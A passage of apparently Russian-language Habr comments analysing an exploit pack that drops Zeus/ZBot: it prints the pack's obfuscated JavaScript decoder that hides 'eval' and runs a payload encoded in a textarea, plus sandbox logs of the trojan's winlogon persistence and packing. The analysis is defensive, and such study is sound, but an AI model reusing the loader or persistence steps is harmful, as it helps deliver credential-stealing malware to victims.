Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
Object porsa(Object object, Object[] params). Видимо соль в том, что вызыватель обходит защиту песочницы. Интересно, как.
То бишь апплету передаётся уникальное значение параметра pid. На основании этого он генерирует вывод, используемый в последующем декодировании:
var vrq = null;var mgi = document.styleSheets[0].rules || document.styleSheets[0].cssRules;for(var dcwes = 0; dcwes < mgi.length; dcwes++) {var ztffs = mgi.item ? mgi.item(dcwes) : mgi[dcwes];roz=(ztffs.cssText) ? ztffs.cssText : ztffs.style.cssText;vrq = roz.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};var s = "";var g = function(){return this;}();dtvu = g["e"+vrq.substr(0,2)+"l"];clrn = document.getElementsByTagName("textarea")[9-9].value.split(",");hqon=dtvu(vrq.substr(2));for (var i = 0; i < clrn.length; i++) {bzmwy = 9501 - 1*clrn[i];s += hqon(bzmwy);}dtvu(s);
При этом "textarea" - массив данных в самом html.
Попытка декодирования такого файла увы приводит к ошибке:
[nothing detected] script
info: [decodingLevel=0] found JavaScript
error: undefined variable document.styleSheets
error: line:1: SyntaxError: missing ; before statement:
error: line:1: var document.styleSheets = 1;
error: line:1: ....^
error: line:3: SyntaxError: missing } in XML expression:
error: line:3: 92,9400,9390,9384,9385,9461,9400,9391,9401,9406,9387,9400,9401,9396,9387,9400,9402,9385,9457,9469,9447,9453,9453,9453,9460,9442,9376,9400,9382,9383,9399,9461,9460,9442
Причина - невыполненный апплет Явы.
А вот в реальном браузере всё выполняется ив результате немедленно в %temp% дропается файл и запускается на выполнение:

Этот файл имеет низкий детект и упакован UPX:
UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]
Под UPX имеется ещё и прот:
AHTeam EP Protector 0.3 (fake PCGuard 4.03-4.15) -> FEUERRADER [Overlay] *
Однако это фальшивая информация - протектор изменён, а потому распаковывать надо вручную. Файл также имеет низкий детект.
Короче! Анализ файлов указывает на поведение, характерное для Zeus/ZBot:
Анализ исходного файла.
Анализ файла без UPX.
Можно ещё копать, но мне кажется, пока ответ исчерпывающий - Вы нашли эксплоит-пак с рассадником ZBot. Может нового, а может - просто перепакованного.Trojan-PWS.Win32.Zbot (Sig-Id:51778970)
Executing: d:\mxmt-upx.exe
...
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [d:\mxmt-upx.exe]
CreateMutex(_AVIRA_21099) [d:\mxmt-upx.exe]
...
RegCreateKeyEx(HKLM\software\microsoft\windows nt\currentversion\winlogon,(null)) [d:\mxmt-upx.exe]
RegSetValueEx(HKLM\software\microsoft\windows nt\currentversion\winlogon\userinit, REG_SZ: C:\WINDOWS\System32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,) [d:\mxmt-upx.exe]
DeleteFile(C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]
Copy(D:\mxmt-UPX.exe->C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]LM\System\CurrentControlSet\Services\FCI\ImagePath REG_EXPAND_SZ 80 «C:\WINDOWS\system32\svchost.exe:ext.exe»
Детективная история в стиле Java/JS